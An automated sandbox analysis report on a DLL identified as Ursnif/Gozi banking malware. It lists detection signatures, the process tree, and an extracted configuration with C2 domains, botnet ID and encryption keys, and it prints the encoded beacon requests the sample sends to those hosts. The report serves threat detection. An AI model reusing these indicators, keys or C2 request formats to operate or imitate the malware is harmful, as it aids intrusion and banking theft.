Windows Analysis Report 616412739e268.dll

Overview

General Information

Sample Name: 616412739e268.dll
Analysis ID: 500413
MD5: 9e67e68ddbedba865b91b5469ab642ef
SHA1: f2c7b0735343081be06e48616d0fc14235a28744
SHA256: 41c0934ba1be030dbae45893107f6a2ae5f99c79d7634626263cdf809f7556ee
Tags: brt, dll, gozi, isfb, ursnif

Detection

Ursnif
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Writes or reads registry keys via WMI
Writes registry values via WMI
Uses 32bit PE files
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7036 cmdline: loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 7040 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7052 cmdline: rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7072 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6452 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7072 -s 636 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 1364 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6824 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 644 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6464 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6368 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 632 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.916426520.0000000003BB8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.974874720.000000000573B000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.916847995.0000000003BB8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
(5 of 31 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
4.3.rundll32.exe.8aa31a.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.3.rundll32.exe.322a31a.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
5.3.rundll32.exe.2eca31a.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
5.3.rundll32.exe.2eca31a.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
3.3.rundll32.exe.342a31a.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
(5 of 18 entries shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmp | Malware Configuration Extractor: Ursnif (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: 616412739e268.dll | ReversingLabs: Detection: 24%
Multi AV Scanner detection for domain / URL
Source: areuranel.website | Virustotal: Detection: 6%
Source: breuranel.website | Virustotal: Detection: 6%
Source: 616412739e268.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: unknown | HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.97.116.82:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.97.183.162:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.97.218.82:443 -> 192.168.2.4:49808 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.97.153.146:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.97.218.66:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.97.137.210:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49829 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.97.153.146:443 -> 192.168.2.4:49860 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.98.207.194:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.101.124.226:443 -> 192.168.2.4:49862 version: TLS 1.2
Source: 616412739e268.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\wheel\receive\Many-rise\score.pdb | source: loaddll32.exe, 00000000.00000002.1186382182.000000006E34B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1187500512.000000006E34B000.00000002.00020000.sdmp, 616412739e268.dll

                      Networking:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 52.97.218.66 187
                      Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 40.97.153.146 187
                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 13.82.28.61 187
                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 52.97.137.210 187
                      Source: Joe Sandbox View | ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
                      Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: Joe Sandbox View | IP Address: 40.97.153.146 40.97.153.146
                      Source: Joe Sandbox View | IP Address: 13.82.28.61 13.82.28.61
                      Source: global traffic | HTTP traffic detected: GET /mail/liopolo/31Pla_2BCXtei/1R_2BY6O/xV8Y0PePoExsKvdRsArLjMT/0HY9ewGl4d/RTh7V4sy0BSH_2Btl/9sqK23pzW1xY/kPT6lmvGYLw/Cf2IOR2fhZTyNL/tKZ289_2FYjlbDZolDbOl/xXcWSCD6IlQGRdIS/84EeVY8JQpYoU7N/sMotozvUSzPLgYoFpN/L9urq8t4YJmiCxPtVCV/XUD.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: msn.com
                      Source: global traffic | HTTP traffic detected: GET /mail/liopolo/NtZggqxIX2EF9w_2/BavTQ0jHk8z72E0/mrA_2BNo5fGf18qS53/GIhA4FNpc/qIQbJVkxLHpIx3LzJcYF/3uQz3PgIC5Pjndy7vBH/i_2FOaoK6pUzqTQ2mVu3pq/cfXt8VkJHx4pF/9i2ySYSz/e6Fwjd_2BYZ5QEKc2Ev8w_2/FX9nTU6mpV/BkgebLJcyW_2BOHak/X7QoD77ir05E/ic.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: msn.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: www.outlook.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.office365.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: www.outlook.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.office365.com
                      Source: global traffic | HTTP traffic detected: GET /mail/liopolo/5hHdOh6aVGIiN/xm3v7_2B/EkShunhzAo7MsZ9CmkqFWtX/3z_2Bns4ON/91CWMsZkh9K0L_2FK/DGWBtSEwajEJ/0TtpREbudd5/QgJK102N2T9j48/a7_2B8h2NmEQ_2FO6HINr/eS5x2dWmrnxEuUas/E6VYZyoESNredc4/JUFmKkMiSye_2BBKeH/JexZCfmhU/vSKjW_2B8KOY/RYzBQt1.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: msn.com
                      Source: global traffic | HTTP traffic detected: GET /mail/liopolo/QoeEw7znNY9KuZLPv/PhlDvAFg0Bnn/nVx6DnTynJS/Jqe2AOjRD8vYJs/PuqBLIn3Zd37OXyJlwD7Q/FiLhjKnVW_2ByswX/LXphFosRYtREZOL/Q6wDOp8ES889SSlI1S/AFbHRrWLn/_2F7R_2FVhgDELEonTCy/KSLPzpnW0YF_2FoB4Xy/kHR_2F88KI6KqxU9hJvbKE/it_2FLM35/c.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: msn.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: www.outlook.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.office365.com
                      Source: unknown | Network traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49862
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49861
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49860
                      Source: unknown | Network traffic detected: HTTP traffic on port 49807 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49810 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49809 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49860 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49779
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49811
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49810
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknown | Network traffic detected: HTTP traffic on port 49862 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49827 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49829 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49808 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49809
                      Source: unknown | Network traffic detected: HTTP traffic on port 49806 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49808
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49807
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49829
                      Source: unknown | Network traffic detected: HTTP traffic on port 49811 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49806
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49827
                      Source: unknown | Network traffic detected: HTTP traffic on port 49861 -> 443
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Length: 1245 | Content-Type: text/html | Server: Microsoft-IIS/10.0 | request-id: fee0e76a-0690-24c5-d39f-a0f3ac107e50 | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | X-CalculatedFETarget: VI1PR0102CU003.internal.outlook.com | X-BackEndHttpStatus: 404 | X-FEProxyInfo: VI1PR0102CA0087.EURPRD01.PROD.EXCHANGELABS.COM | X-CalculatedBETarget: VI1PR04MB4495.eurprd04.prod.outlook.com | X-BackEndHttpStatus: 404 | X-RUM-Validated: 1 | X-Proxy-RoutingCorrectness: 1 | X-Proxy-BackendServerStatus: 404 | MS-CV: aufg/pAGxSTTn6DzrBB+UA.1.1 | X-FEServer: VI1PR0102CA0087 | X-Powered-By: ASP.NET | X-FEServer: AS8PR04CA0081 | Date: Mon, 11 Oct 2021 22:38:46 GMT | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Length: 1245 | Content-Type: text/html | Server: Microsoft-IIS/10.0 | request-id: 463ae588-6705-a5a4-dc70-c20dde540b89 | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | X-CalculatedFETarget: HE1PR0202CU001.internal.outlook.com | X-BackEndHttpStatus: 404 | X-FEProxyInfo: HE1PR0202CA0016.EURPRD02.PROD.OUTLOOK.COM | X-CalculatedBETarget: HE1P194MB0201.EURP194.PROD.OUTLOOK.COM | X-BackEndHttpStatus: 404 | X-RUM-Validated: 1 | X-Proxy-RoutingCorrectness: 1 | X-Proxy-BackendServerStatus: 404 | MS-CV: iOU6RgVnpKXccMIN3lQLiQ.1.1 | X-FEServer: HE1PR0202CA0016 | X-Powered-By: ASP.NET | X-FEServer: AM6P194CA0062 | Date: Mon, 11 Oct 2021 22:38:53 GMT | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Length: 1245 | Content-Type: text/html | Server: Microsoft-IIS/10.0 | request-id: bd6df30b-3506-0654-39aa-09111fc341ce | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Alt-Svc: h3=":443",h3-29=":443" | X-CalculatedFETarget: VI1PR07CU008.internal.outlook.com | X-BackEndHttpStatus: 404 | X-FEProxyInfo: VI1PR07CA0252.EURPRD07.PROD.OUTLOOK.COM | X-CalculatedBETarget: VI1PR01MB6621.EURPRD01.PROD.EXCHANGELABS.COM | X-BackEndHttpStatus: 404 | X-RUM-Validated: 1 | X-Proxy-RoutingCorrectness: 1 | X-Proxy-BackendServerStatus: 404 | MS-CV: C/NtvQY1VAY5qgkRH8NBzg.1.1 | X-FEServer: VI1PR07CA0252 | X-Powered-By: ASP.NET | X-FEServer: AM5PR0101CA0012 | Date: Mon, 11 Oct 2021 22:40:08 GMT | Connection: close
                      Source: loaddll32.exe, 00000000.00000003.1005981116.00000000016C2000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.899844356.00000000045A7000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000002.928906655.00000000048CC000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000002.940321648.0000000005220000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000003.1093713289.0000000001713000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmp | String found in binary or memory: http://ogp.me/ns#
                      Source: loaddll32.exe, 00000000.00000003.1093713289.0000000001713000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmp | String found in binary or memory: http://ogp.me/ns/fb#
                      Source: loaddll32.exe, 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931542596.00000000058BC000.00000004.00000040.sdmp | String found in binary or memory: https://blogs.msn.com/
                      Source: loaddll32.exe, 00000000.00000003.1181590460.00000000016A1000.00000004.00000001.sdmp | String found in binary or memory: https://breuranel.website/liopolo/q3ygJYAFVGZ_2F/lrVZdSxP5qWZx0IQW_2Fv/fatA_2F92zFSM6Wv/k_2BiVYapNB7
                      Source: loaddll32.exe, 00000000.00000003.1005943661.000000000169F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1093682966.000000000170D000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.931542596.00000000058BC000.00000004.00000040.sdmp | String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                      Source: loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.917087190.00000000016FB000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633991885&rver
                      Source: rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmp | String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633991891&rver
                      Source: loaddll32.exe, 00000000.00000003.1093773062.0000000003BBB000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633991967&rver
                      Source: rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmp | String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633991974&rver
                      Source: loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.1093739436.0000000003BBC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108208109.00000000058BC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmp | String found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=en-us"
                      Source: loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmp | String found in binary or memory: https://msn.com/
                      Source: loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmp | String found in binary or memory: https://msn.com/D
                      Source: loaddll32.exe, 00000000.00000003.917168598.0000000001701000.00000004.00000001.sdmp | String found in binary or memory: https://msn.com/f
                      Source: loaddll32.exe, 00000000.00000003.1181590460.00000000016A1000.00000004.00000001.sdmp | String found in binary or memory: https://outlook.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abY
                      Source: loaddll32.exe, 00000000.00000003.1005981116.00000000016C2000.00000004.00000001.sdmp | String found in binary or memory: https://outlook.office365.com/
                      Source: loaddll32.exe, 00000000.00000003.1005981116.00000000016C2000.00000004.00000001.sdmp | String found in binary or memory: https://outlook.office365.com/2H
                      Source: loaddll32.exe, 00000000.00000002.1184438243.00000000016C2000.00000004.00000001.sdmp | String found in binary or memory: https://outlook.office365.com/9H
                      Source: loaddll32.exe, 00000000.00000003.1005814049.000000000170B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1005878880.0000000001706000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1005753123.000000000170C000.00000004.00000001.sdmp | String found in binary or memory: https://outlook.office365.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/Bo
                      Source: loaddll32.exe, 00000000.00000003.1181590460.00000000016A1000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1181707542.0000000001715000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmp | String found in binary or memory: https://outlook.office365.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNus
                      Source: loaddll32.exe, 00000000.00000003.1093773062.0000000003BBB000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.917087190.00000000016FB000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmp | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/en-us//api/modules/cdnfetch"
                      Source: loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108208109.00000000058BC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmp | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/en-us/homepage/_sc/css/d7cb56b9-3a82770e/direct
                      Source: WerFault.exe, 0000000C.00000002.928906655.00000000048CC000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000002.929018615.0000000004983000.00000004.00000001.sdmp | String found in binary or memory: https://watson.tel
                      Source: rundll32.exe, 00000003.00000003.930983342.00000000058B8000.00000004.00000040.sdmp | String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gi
                      Source: loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108208109.00000000058BC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmp | String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
